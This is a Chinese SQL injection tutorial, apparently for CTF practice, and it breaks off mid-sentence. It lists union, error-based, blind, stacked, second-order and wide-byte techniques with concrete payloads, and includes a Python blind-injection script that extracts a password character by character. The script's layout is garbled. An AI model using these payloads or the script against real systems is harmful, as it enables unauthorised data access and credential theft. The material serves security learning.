常见SQL注入类型
最基础的注入-union注入攻击Boolean注入攻击-布尔盲注报错注入攻击时间注入攻击-时间盲注堆叠查询注入攻击二次注入攻击宽字节注入攻击base64 注入攻击cookie注入攻击-http请求头参数注入XFF注入攻击-http请求头参数注入知道绝对路径的注入
最基础的注入-union注入攻击
判断是get型还是post型注入;
找到正确的闭合规则;
order by 查询字段数;
union select 1,2…# 查询显示位是第几位,没有的话就试试把id=1显示位让出,令id=-1;
获取数据库名: -1’ union select 1,database(),3#
获取表名: -1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“news”#
获取列名: -1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“serect_table”#
读数据: -1’ union select 1,fl4g,3 from secret_table#
Boolean注入攻击-布尔盲注
查看现象,能报错,但没有报错信息,正确查询也显示不了查询内容就属于布尔盲注,只存在两种状态,对或错;由页面的两种不同返回的状态来判定我们的闭合规则;为了方便,我们这里假设返回正确用“yes”,返回错误用“no”来表示这两种状态;找到闭合规则后,我们在闭合规则里面 and 1=1 和 and 1=2 测试,查看是否两种返回状态;布尔盲注要用到length()和substr()语句,用两种状态来猜解数据库,表名等的长度和正确字母;先用 and length(database())>2 来猜数据库的长度;(使用二分法)再用 and substr(database(),1,1)=‘t’ 来确定第一个字母,可以脚本逐个判断字母,若返回yes即是;and substr(database(),2,1)=“t” 代表第二个字母;最后结合长度,成功将数据库猜解出来;之后类似union注入步骤; 脚本举例:
import requests
as req
url
= "http://[docker].cloudeci1.ichunqiu.com/index.php"
data
= {
"username" : '''admin\\''',
"password" : ""
}
res
= ""
for position
in range(1,30):
for i
in range(32,127):
payload
= f
"or/**/ascii(substr(password,{position},1))>{i}#"
data
["password"] = payload
r
= req
.post
(url
=url
, data
=data
)
if r
"<div>密码错误" not in r
.text
:
res
+= chr(i
)
print(res
)
break
else:
continue
报错注入攻击
只要注入点有sql报错信息,那么就可以使用报错注入;还是一样,引号报错,然后找到闭合规则,页面正常显示,则可以在闭合规则中开始写入报错注入的sql语句;updatexml报错获取当前数据库:
and updatexml (1,concat(0x7e,(select database()),0x7e),1)
floor报错获取当前数据库:
and (select 1 from (select count(*),concat((database()),floor (rand(0)*2)x from info rmation_schema.tables group by x)a)
利用select语句替换掉database()来继续获取数据库中的表名,字段名,查询语句和union注入攻击的语句相同;只不过这里不能再使用group_concat了,因为报错注入只显示一条结果,需要使用limit语句;
时间注入攻击-时间盲注
没有明确的现象,不管是对是错都返回一个状态;但是如果用sleep(5)方法,能让响应时间延迟为5秒以上,那么就为时间盲注;我们用sleep(5)函数构造了一个时间延时的状态,因此,我们又有了两种状态,像布尔盲注一样可以根据这两种状态来判定数据库,表名和字段名的长度和正确的每个字母;同样的找到正确的闭合规则,当然,这个闭合规则得配合着 and sleep(5)语句来构造,哪一个闭合规则执行了sleep(5),那么就是正确的闭合规则;时间盲注配合着 if(A,B,C) 语句结合使用,含义是:如果A是true,则返回B(即执行B),否则返回C(执行C);那么判断当前数据库名长度的语句为: if (length (database())>1,sleep(5),1) 如果说数据库的长度大于1,那么响应延时5秒,否则执行select 1(也就是不延时),由此来推出数据库长度。判断当前数据库名的第一个和第二个字母的语句: if(substr(database(),1,1)='s',sleep(5),1) if(substr(database(),2,1)='s',sleep(5),1) 只有第一个字母等于26个字母中正确字符时,才会延时5秒,因此可以通过burp或者sqlmap跑。根据数据库名长度以此内推即可得出完整的数据库的库名,表名,字段名和具体内容。
堆叠查询注入攻击
可以使用堆叠注入的地方也可以使用布尔盲注和时间盲注;同样先找出正确的闭合规则,然后也看两种状态来猜解库名,表名等;堆叠注入的语句为 ;select if(length(database())>1,sleep(3),1) ;select if(substr(database(),1,1)='r',sleep(3),1)按照原理来说,分号后面可以执行新sql语句,但是很多时候没有必要,若遇到其他注入方法不行时可以尝试,不常用。
二次注入攻击
二次注入一共有两个url,url一用来注入,也就是注入点,插入sql语句的地方,另外一个url用来返回信息;也就是url一插入了sql语句,url一的响应里面就会返回这条信息对应的id值,然后url二就传入这个新id值,然后访问,响应回来之后将会爆出sql语句查询的结果,正确或者错误的sql信息;就相当于url一是一个用户注册的地方,用户注册后会在数据库里面加入新id存放用户的注册信息,那么这个id可以传给url二来访问,url二就可以显示出用户的注册信息,但如果注册信息含有恶意sql语句,url二就会显示出敏感的数据库信息;跟union注入攻击差不多,只是回显的信息需要再另外的url中显示出来了;之后步骤同union注入常规步骤;
宽字节注入攻击
如果遇到单,双引号被转义,变成了反斜杠,导致,参数id无法逃逸单引号的包围;一般情况下,此处是不存在sql注入漏洞的;但是如果数据库的编码为GBK时,就可以使用宽字节注入,因此在不知道是否是GBK编码时,都可以进行尝试;宽字节的格式是在地址后先加一个
